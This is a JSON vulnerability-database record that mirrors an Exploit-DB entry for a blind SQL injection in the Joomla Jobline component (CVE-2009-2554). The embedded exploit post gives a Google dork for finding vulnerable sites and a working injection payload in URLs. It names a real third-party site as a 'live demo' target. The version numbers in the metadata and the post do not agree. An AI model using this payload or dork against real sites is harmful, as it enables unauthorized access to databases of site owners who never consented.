{"id": "EDB-ID:9187", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla! Component Jobline 1.3.1 - Blind SQL Injection", "description": "", "published": "2009-07-17T00:00:00", "modified": "2009-07-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/9187", "reporter": "ManhLuat93", "references": [], "cvelist": ["2009-2554"], "immutableFields": [], "lastseen": "2022-01-13T07:00:31", "viewCount": 36, "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://www.exploit-db.com/download/9187", "sourceData": "##################################################\r\n# Joomla Component: Jobline <= 1.1.3.1 (search) / Blind SQL Injection Vulnerability\r\n# Download: http://joomlacode.org/gf/download/frsrelease/3721/8325/jobline-1_1_2_2.zip\r\n# Dork: inurl:\"index.php?option=com_jobline\"\r\n# ---> magic_quotes_gpc =Off\r\n# ==================================\r\n# {Author}: ManhLuat93\r\n# {My HomePage}: http://manhluat.com/\r\n##################################################\r\n\r\nLive Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=\r\n\r\n[-] Exploit [+]\r\n\r\n[--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='\r\n\r\n[++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='\r\n\r\n\r\nnote:\r\n<name>Jobline</name>\r\n<creationDate>08 Jan 2008</creationDate>\r\n<version>1.3.1</version>\r\n<joomlaVersion>1.5</joomlaVersion>\r\n<copyright>(c) 2006 Olle Johansson</copyright>\r\n<license>GNU GPL</license>\r\n\r\n\r\n# milw0rm.com [2009-07-17]", "osvdbidlist": ["55970"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1646951601}}
{}